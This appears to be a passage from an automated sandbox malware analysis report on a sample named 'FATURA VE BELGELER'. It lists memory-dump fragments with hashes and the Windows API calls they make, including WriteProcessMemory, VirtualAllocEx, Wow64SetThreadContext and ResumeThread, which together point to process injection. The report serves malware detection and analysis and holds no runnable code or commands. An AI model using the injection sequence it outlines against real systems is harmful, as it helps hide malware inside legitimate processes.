                                                              • Opcode Fuzzy Hash: 27c1e9d0f961adfc1c3cd08ec27de7dfd4ba63c91ba72427dcfbd957e740126a
                                                              • Instruction Fuzzy Hash: 1B4115B4C0071DCBEB24CFA9C884BDDBBB5BF49304F20805AD409AB250DB75694ACF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 639 28a590c-28a5913 640 28a591c-28a59d9 CreateActCtxA 639->640 642 28a59db-28a59e1 640->642 643 28a59e2-28a5a3c 640->643 642->643 650 28a5a4b-28a5a4f 643->650 651 28a5a3e-28a5a41 643->651 652 28a5a60-28a5a90 650->652 653 28a5a51-28a5a5d 650->653 651->650 657 28a5a42-28a5a47 652->657 658 28a5a92-28a5b14 652->658 653->652 657->650
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 028A59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 083f5a3167e31065306b7589f570e136cbc4285212b0bdb1e025beecba577798
                                                              • Instruction ID: b3ed488cf03683ef4375de2b1ccaee7b7903c1dd9ef5aee07c2da69e39ee8154
                                                              • Opcode Fuzzy Hash: 083f5a3167e31065306b7589f570e136cbc4285212b0bdb1e025beecba577798
                                                              • Instruction Fuzzy Hash: F34123B4D00719CFEB24CFA9C9947CDBBB1BF49304F20805AD409AB250DB75698ACF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 661 28ad421-28ad428 662 28ad42a-28ad54e 661->662 663 28ad3e4-28ad3f4 DuplicateHandle 661->663 664 28ad3fd-28ad41a 663->664 665 28ad3f6-28ad3fc 663->665 665->664
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: efd87fa9a8af45dcc1b5a9360745a6159854795fddb7a150241c9c600a57ff03
                                                              • Instruction ID: 6083f101735e057756d29509d5c3ed0a1d8024610145d5aaf1f8ab3a2d3c2835
                                                              • Opcode Fuzzy Hash: efd87fa9a8af45dcc1b5a9360745a6159854795fddb7a150241c9c600a57ff03
                                                              • Instruction Fuzzy Hash: 39318478A813448FE3059F70F4547693BA6F7C4711F60893AE9658B3D9EBB84866CB20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 679 6ccdcd8-6ccdd2e 681 6ccdd3e-6ccdd7d WriteProcessMemory 679->681 682 6ccdd30-6ccdd3c 679->682 684 6ccdd7f-6ccdd85 681->684 685 6ccdd86-6ccddb6 681->685 682->681 684->685
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CCDD70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: baf6c33344bb9a40b779b222f85fa058e2bba467793c6ddcd1799d3406b36cf1
                                                              • Instruction ID: 86ff2261a8d2bc9694ea7ac2da36237717b0a9c4c3bc28e25b788b0342e22a57
                                                              • Opcode Fuzzy Hash: baf6c33344bb9a40b779b222f85fa058e2bba467793c6ddcd1799d3406b36cf1
                                                              • Instruction Fuzzy Hash: AB2127B5D002499FDB10DFA9C885BEEBBF5FF48324F10842AE559A7240C778A545CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 689 6ccdce0-6ccdd2e 691 6ccdd3e-6ccdd7d WriteProcessMemory 689->691 692 6ccdd30-6ccdd3c 689->692 694 6ccdd7f-6ccdd85 691->694 695 6ccdd86-6ccddb6 691->695 692->691 694->695
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06CCDD70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 3dfde120177aa398cbcaa32e87c97aec39db85483536b8167a4b7499239eae4e
                                                              • Instruction ID: b9d6877210072f275cd382e9b2d0bfbde612aa0aef06705db8bb353c62844944
                                                              • Opcode Fuzzy Hash: 3dfde120177aa398cbcaa32e87c97aec39db85483536b8167a4b7499239eae4e
                                                              • Instruction Fuzzy Hash: 2421F7B5D002499FCB10DFA9C885BDEBBF5FF48310F508429E519A7250C778A545CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 699 28aca00-28ad3f4 DuplicateHandle 701 28ad3fd-28ad41a 699->701 702 28ad3f6-28ad3fc 699->702 702->701
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: acc09241762c3215485ac3afadb19ef0752af69cb2536aacb289ed64a3cb4697
                                                              • Instruction ID: 7e99bfbea33b04076ce79ac52dfb28776b6647be1802ee2c28a6cbb1d860e307
                                                              • Opcode Fuzzy Hash: acc09241762c3215485ac3afadb19ef0752af69cb2536aacb289ed64a3cb4697
                                                              • Instruction Fuzzy Hash: 5621E3B990024C9FDB10CF9AD584AEEBBF8FB48310F14801AE918E7350D779A954CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028AD326,?,?,?,?,?), ref: 028AD3E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 3e724d49e850f57832f650c1060c64f8f9d9ce1330ff1336fd10ffaebb97f87b
                                                              • Instruction ID: 12713f6341dee23281edf63661465a3dfa41554e9f565cbd8600f5f8443bcd97
                                                              • Opcode Fuzzy Hash: 3e724d49e850f57832f650c1060c64f8f9d9ce1330ff1336fd10ffaebb97f87b
                                                              • Instruction Fuzzy Hash: 712112B59002089FDB10CFAAD984AEEBFF4FB48310F14801AE918A7350D378A945CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CCDBC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: bbeae706cdca8554bcbf3f1256e59a647d983fb5236112a0a82b5636d64a98c9
                                                              • Instruction ID: 2cca6b6981010a56640fecd4d69e49d1a84983c3640921a0dbb6900c34c85ac4
                                                              • Opcode Fuzzy Hash: bbeae706cdca8554bcbf3f1256e59a647d983fb5236112a0a82b5636d64a98c9
                                                              • Instruction Fuzzy Hash: DE2139B5D002498FDB10DFAAC4857EEBBF4EF89324F14842DD519A7241C778A585CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CCDE50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 612b9c4ba814f45d750693fae7f6c27257a14338b677ee365ac235aeaa3c48bd
                                                              • Instruction ID: cac8a42a2505e62ff1e72393af7084b90899ca0eefea86532a9d4e9f3114d0c7
                                                              • Opcode Fuzzy Hash: 612b9c4ba814f45d750693fae7f6c27257a14338b677ee365ac235aeaa3c48bd
                                                              • Instruction Fuzzy Hash: 5C2119B1C002499FDB10DFAAC8806EEFBF5FF48310F50842EE559A7250C7789945CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06CCDE50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: e815b62f34f233d359180f8f73155adc72b2f3d3bf865b20505ac1ebae356d38
                                                              • Instruction ID: 3a010abea37a75844320d6465ac35a204a34450bdf2e5219059cb90f9f91dd1d
                                                              • Opcode Fuzzy Hash: e815b62f34f233d359180f8f73155adc72b2f3d3bf865b20505ac1ebae356d38
                                                              • Instruction Fuzzy Hash: 9F21F8B1C002499FCB10DFAAC885AEEFBF5FF48310F50842EE519A7250D779A945CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CCDBC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 9177d14f7586eee6d105cdf09c0be45d711a103d8e200143468191e00046fdc4
                                                              • Instruction ID: 09e3ff651b4bf9e965c365b0c8e1353035949a3aaf27e087cdcc3b0765cab97d
                                                              • Opcode Fuzzy Hash: 9177d14f7586eee6d105cdf09c0be45d711a103d8e200143468191e00046fdc4
                                                              • Instruction Fuzzy Hash: 6E2118B5D002098FDB10DFAAC4857EEBBF4EF88324F54842ED519A7240CB78A945CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AB161,00000800,00000000,00000000), ref: 028AB372
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: de0c07b985bb862b6a402d7f8db4d01e9bcfea66dd228867bfd5060b9440ca1e
                                                              • Instruction ID: 77e87f5d80fc619d035a21c9e062a1824011f96c7102a42a6d98b0cee1d12c70
                                                              • Opcode Fuzzy Hash: de0c07b985bb862b6a402d7f8db4d01e9bcfea66dd228867bfd5060b9440ca1e
                                                              • Instruction Fuzzy Hash: CC1126BA9003498FDB10CFAAD884ADEFBF4EB58314F14852AD519A7200C779A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AB161,00000800,00000000,00000000), ref: 028AB372
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 2f6da20457b269583adda7bf34a009de969d27225067a51ba89145b55e31c6a8
                                                              • Instruction ID: 4311ba6b8fbc28a1b86560efc62c254fff42eec36caf3fc39ff2de01c3142924
                                                              • Opcode Fuzzy Hash: 2f6da20457b269583adda7bf34a009de969d27225067a51ba89145b55e31c6a8
                                                              • Instruction Fuzzy Hash: 501153BA8003489FDB10CF9AC444ADEFBF4EF58318F14812AE519A7200C7B9A545CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CCDC8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 74d82cd0f31dac4f642e02a4273f0856b886dfe4c4b352b6410f2a99aa0b1f93
                                                              • Instruction ID: 9093f892680f1db5118162ccebc65234c3d0f7de4b5488b3a0cf961e7f9507bc
                                                              • Opcode Fuzzy Hash: 74d82cd0f31dac4f642e02a4273f0856b886dfe4c4b352b6410f2a99aa0b1f93
                                                              • Instruction Fuzzy Hash: 291137758002499FCB10DFAAD844AEEFFF5EF88324F24881DE519A7250C77AA545CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CCDC8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: f7dbd26b4a2855020c072778d2208d8b91cfa61d757c7a2e0d83a7e7d7d6ba72
                                                              • Instruction ID: c050fc819ff8c392a77fbe56dd30c7103f5307e34f595b8e25a6efa72597ca8d
                                                              • Opcode Fuzzy Hash: f7dbd26b4a2855020c072778d2208d8b91cfa61d757c7a2e0d83a7e7d7d6ba72
                                                              • Instruction Fuzzy Hash: D71137758002499FCB10DFAAC844AEEBFF5EF48320F108419E519A7250C779A544CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04B21C69,?,?), ref: 04B21E10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: d2cfdf4068d5bc37111fe50f214ef8e0685e29c850fdc8856b3035bb9197a258
                                                              • Instruction ID: 48aeede4a641c9453f2bc0135e82e531970b7fdabc3f44394d6036310069ed33
                                                              • Opcode Fuzzy Hash: d2cfdf4068d5bc37111fe50f214ef8e0685e29c850fdc8856b3035bb9197a258
                                                              • Instruction Fuzzy Hash: 3B1136B5800249CFDB20DF99D585BDEBBF4EB48320F24845AD958A7340C778A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04B21C69,?,?), ref: 04B21E10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: f53757320756e04e2e0481ab316a018b0a861148bd489ac87ca967c79d630030
                                                              • Instruction ID: 6488e37c2174f94e40c5d71dfe1b21b670d23928ee2f4c21c89c662dea668251
                                                              • Opcode Fuzzy Hash: f53757320756e04e2e0481ab316a018b0a861148bd489ac87ca967c79d630030
                                                              • Instruction Fuzzy Hash: CF1125B5800249CFDB20DF9AC544BEEBBF4EB48320F10845AD958A7240D778A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 06CCDAFA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: bf182255bf2e8849c23710f23c9c40469684005e1f2edde3de2548d8ae018d47
                                                              • Instruction ID: c8023dc83d7f797a252bb6b36d79a563c23b982d5bad5e1c93a2da2a12e2ff87
                                                              • Opcode Fuzzy Hash: bf182255bf2e8849c23710f23c9c40469684005e1f2edde3de2548d8ae018d47
                                                              • Instruction Fuzzy Hash: 711146B1D002488BCB10DFAAC4847EEFBF5EF88324F208819D519A7240CB79A545CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 06CCDAFA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1991012933.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6cc0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: cdb827dc67c006dc9636f9acbe750b19e9b5c8ad29dddf19e49c57b27e73c4ef
                                                              • Instruction ID: dcaf10c37886a838a9c09fbed6ca086c08810a056faaf0a9ffde51c4703400e8
                                                              • Opcode Fuzzy Hash: cdb827dc67c006dc9636f9acbe750b19e9b5c8ad29dddf19e49c57b27e73c4ef
                                                              • Instruction Fuzzy Hash: F1113AB1D002488FCB10DFAAC4457EEFBF5EF88324F208419D519A7240CB79A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 028AB0E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1988025979.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_28a0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 9fcb6122cccbcc23fa6f0f077bb10b61153d30b63fb5c7783d9ee56180246b2a
                                                              • Instruction ID: cb4bf9a15bc107096b982a5fc5b7a7cfd260f8791b152cdb7030c52c8972cfba
                                                              • Opcode Fuzzy Hash: 9fcb6122cccbcc23fa6f0f077bb10b61153d30b63fb5c7783d9ee56180246b2a
                                                              • Instruction Fuzzy Hash: 4B110FB9C003498FDB20DF9AD444A9EFBF4EF89214F10842AD528A7200C779A549CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 04B2031D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: eeeea0ea05cbc349650216dcec9928c71703dbc66139093a3f4dd4458bfe9f99
                                                              • Instruction ID: ce2a2f1e9cfb0a119d014afe09ce6e6f2d4547aa3db7c370b80aab48f6f50970
                                                              • Opcode Fuzzy Hash: eeeea0ea05cbc349650216dcec9928c71703dbc66139093a3f4dd4458bfe9f99
                                                              • Instruction Fuzzy Hash: FA11F2B5800259CFDB10DF99D584BDFBBF8EB48320F10845AE659A7650C379A544CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 04B2031D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1990303500.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b20000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a934f67d20d1fba950618fea4ddd544452e4fb684658f674e18948521094235a
                                                              • Instruction ID: b58577c3525a67ceea329e9d17dbca5c044e1bd1377c835345b8ea26f10f8a58
                                                              • Opcode Fuzzy Hash: a934f67d20d1fba950618fea4ddd544452e4fb684658f674e18948521094235a
                                                              • Instruction Fuzzy Hash: 7711D0B58003499FDB10DF9AD985BDEFBF8EB48320F10845AE658A7200C379A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9e1727509a75f1f993b4dcf3de898389bdad1c26d15b18a302b10dc68b86c34
                                                              • Instruction ID: 650987d3b932abc05d4ae0838a1eb592372c4f29602e9954506b286738e4ea1a
                                                              • Opcode Fuzzy Hash: d9e1727509a75f1f993b4dcf3de898389bdad1c26d15b18a302b10dc68b86c34
                                                              • Instruction Fuzzy Hash: FE213479600248DFDB05DF14D9C0F26BF65FB88318F20C5A9E9098B256CB3AD416CBB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6087f3024813018b2a741091c8fedc0ac55181f06a7b965d27cf4f69ddf3412d
                                                              • Instruction ID: 5c0a619f65608de41635d189f70d4d52e8f5f8a66330b1a7ac2ce3118634a1c3
                                                              • Opcode Fuzzy Hash: 6087f3024813018b2a741091c8fedc0ac55181f06a7b965d27cf4f69ddf3412d
                                                              • Instruction Fuzzy Hash: 6C21487D500208DFDB09DF14C9C0F16BF65FB98328F60C169E9098B256C73AE416C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 085e9fd3d5e849b4d02e1312b14d2e57fd95e2aa3ca371766e1051e1eb57dfb4
                                                              • Instruction ID: 1c4b5dbbc9ffb69ab075e388a43265c71787f5fd52fbef859250912a326c7382
                                                              • Opcode Fuzzy Hash: 085e9fd3d5e849b4d02e1312b14d2e57fd95e2aa3ca371766e1051e1eb57dfb4
                                                              • Instruction Fuzzy Hash: 2921F279504204EFDB05DF24D9C0B26BBA5FB88318F20C56DED098B356C37AE446CA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6cc4a801cd0c178c31ab6497e2eba9880a1a5fbeb70350082bab5cafa87c34e
                                                              • Instruction ID: b7b38c2ed999b3508b1a8b2cb3a4b5ce419bd61b70b99dcf3ca5b67dc6ec68fa
                                                              • Opcode Fuzzy Hash: e6cc4a801cd0c178c31ab6497e2eba9880a1a5fbeb70350082bab5cafa87c34e
                                                              • Instruction Fuzzy Hash: D621D07D604204DFDB14DF24D984B26BF65EF88318F20C569DD0A8B356C33AD407CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987822617.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_285d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 159f2c598822608be28ecdb1db7b821ba5be664cfdc496cb5bb9eaeeaa91bd8c
                                                              • Instruction ID: 5f1cc7fbcf087f02b77a9bce584ef0c0ba3ffac5280dbde66d0a9e1a142a8827
                                                              • Opcode Fuzzy Hash: 159f2c598822608be28ecdb1db7b821ba5be664cfdc496cb5bb9eaeeaa91bd8c
                                                              • Instruction Fuzzy Hash: 1C2162795093808FDB16CF24D994B15BF71EF46214F28C5EADC498B6A7C33A940ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: c9ac03e5c98622f5c41c81111578e069ae78a3df510cde9d6f75359b302fc279
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 9711267A404244CFCB06CF10D5C4B16BF71FB94324F24C6A9DD094B256C33AE45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1987794344.000000000284D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0284D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_284d000_FATURA VE BELGELER.jbxd
                                                              Similarity
